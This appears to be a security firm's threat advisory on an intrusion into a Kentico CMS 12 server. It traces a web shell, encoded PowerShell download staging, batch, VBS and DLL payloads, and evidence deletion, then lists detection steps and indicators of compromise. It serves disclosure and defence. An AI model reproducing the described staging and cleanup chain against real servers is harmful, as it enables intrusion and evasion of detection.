Unraveling the Unknown: A New Threat Targeting Kentico CMS Servers

Welcome to our detailed threat research analysis, where we delve deep into a recent incident involving a compromised web server running Kentico CMS version 12. In this exploration, we’ll illuminate the infection chain, underscore the Indicators of Compromise (IOCs), and provide recommendations for fortifying your organization’s security position. By comprehending the tactics employed by threat actors and implementing proactive defense measures, you can effectively shield your web applications from similar incursions.

A New Threat Targeting Kentico Servers

• • ATS has uncovered a potentially new and evolving cybersecurity threat against web servers running presumably all current hotfix versions of Kentico CMS 12.

• • Threat actors are exploiting an unknown vulnerability to deploy malicious files and web shells, potentially fully compromising the underlying targeted server.

• • A review of the Indicators of Compromise (IOCs) and the sequence of actions related to this threat is essential for understanding the nature of the attack and developing appropriate defensive strategies.

• • We are sharing details about the observed threat activity, IOCs, and advice on how to check if your system has been compromised.

The Discovery: A Compromised Web Server

On May 30, 2023 The ATS InfoSec team observed an encoded PowerShell command being executed on a web server running Kentico CMS. The command initiated the download of a malicious .bat file from Command and Control (C2) infrastructure operated by the threat actors. This file, dll.bat, was downloaded to the public user’s root directory – C:\Users\Public. 

Observed Threat Activity: A Chain of Downloads

In our investigation, we uncovered a series of exploit attempts, which were found by analyzing the IIS logs and EDR telemetry data. It was observed that posts were made against a specific unfamiliar .ashx file (/CMSInlineControls/DocumentAttachments.ashx) from a Chinese IP. At this time, it is unknown how the malicious .ashx document was deployed to the server.  This activity occurred directly before encoded PowerShell commands were executed to begin staging additional post-exploit work. Given the specificity of the file targeted, we believe this to be part of a larger campaign targeting vulnerable versions of Kentico CMS. 

The compromise of the web server initiated a series of malicious activities orchestrated by the threat actors. Let’s examine the infection chain step by step: 

• • Encoded PowerShell commands were executed via a web shell that was discovered on the server. The commands executed an invoke-webrequest function to connect to external malicious C2 infrastructure and download a malicious batch file to C:\users\public\dll.bat.

• • dll.bat was executed, connecting the same C2 to then download a malicious Visual Basic script file to C:\Windows\System32\inetsrv\DownloadFile.vbs.

• • Subsequently, DownloadFile.vbs was executed connect to the C2 once more and download a malicious payload to C:\Windows\System32\inetsrv\HTTPCacheLog.dll.

• • Within the same minute, the threat actor deleted DownloadFile.vbs and dll.bat, a common technique to avoid detection and leave as little trace as possible.

• • Interestingly, after initial staging and the deletion of all related files, there were several attempts to execute DownloadFile.vbs – even though the file had already been removed from the system.

How to Check If You Have Been Compromised

Upon identifying this security threat, ATS’s InfoSec team promptly reached out to Kentico to disclose the exploit activity we observed being performed. This cooperative and responsible disclosure is in line with our mission to enhance overall cybersecurity and to help businesses such as those using Kentico CMS secure their operations. 

Currently, our InfoSec team is diligently researching the scope of these exploits, aiming to understand their full extent and potential impact. Our investigation includes analyzing the nature of the malicious scripts, their propagation methods, and the specific vulnerabilities being exploited in Kentico servers. This ongoing investigation will inform future strategies to mitigate these risks, further enhancing the security of servers running Kentico. 

In light of recent security events, it is essential for all entities utilizing Kentico CMS to promptly assess their systems for the IOCs listed at the end of this post. Your swift action is paramount to preventing damage or data loss. Follow these steps to examine your system for indicators of compromise (IOCs). Additionally, you can consider enlisting the help of the ATS infosec team for professional guidance. 

1. 1. Keep an Eye on PowerShell Commands: Continuously monitor your system for unusual PowerShell commands. Look especially for encoded commands or commands that involve file downloads, as these can be a sign of a security breach. Also, pay attention to any suspicious .bat files that may suddenly appear in your public user’s root directory.

2. 2. Scrutinize Your IIS installation Directory: Check your C:\Windows\System32\inetsrv directory for any unfamiliar .vbs or .dll files. The presence of these could indicate a breach or attempted breach.

3. 3. Inspect Network Logs for Outbound Connections: Carefully examine network logs for any outbound or inbound connections with the IP addresses listed in the IOC section of this post. Such connections could be a sign that your systems are communicating with a potential threat actor.

4. 4. Strengthen Endpoint Security: Implement and maintain robust endpoint security solutions capable of detecting and isolating malicious files. Modern EDR solutions are extremely helpful in combatting new and unknown threats.

These actions aren’t just recommendations; they’re necessary steps to safeguard your valuable digital assets. Remember, prompt detection can be the difference between a minor security concern and a significant system breach. 

Indicators of Compromise (IOCs)

IPs: 

216.83.45[.]170  

C2 server hosting malicious payloads 

172.16.162[.]4  

inbound HTTP connections to web shells 

File Hashes: 

471c6529683afbe3530092daaf5e8a1813c07d4b  

HTTP interpreter, handling RijndaelManaged encryption for the web shell 

eb940f761950cb534a370a67dd08973671493c4a 

web shell file requiring an authentication string, “youdu” 

fec7ae1711175f0df1fd603954b6fde717d4082c 

web shell file

74323bfc140ba7a62866260eb89826cae8d19eeb 

web shell file 

aacd483ccadab7e9aec8dcc2322a0a19e82f0907 

c7583c8cb35b38526bae31142fe92eebd2cc635e 

first stage post-exploit .bat files 

3bfd269a39b80f09568dc976a0453cc8c9ff55df 

second stage post-exploit .vbs file 

f6be54ad941dc3fe84a368842685d58eaf87997c 

third stage post-exploit .dll file 

You’re not alone in this. The ATS InfoSec team is ready and able to support you. If you’re uncertain about your ability to carry out these checks, or if you’d like professional assistance to ensure nothing is overlooked, don’t hesitate to reach out. Our team of experts can help guide you through these checks and advise on any necessary next steps.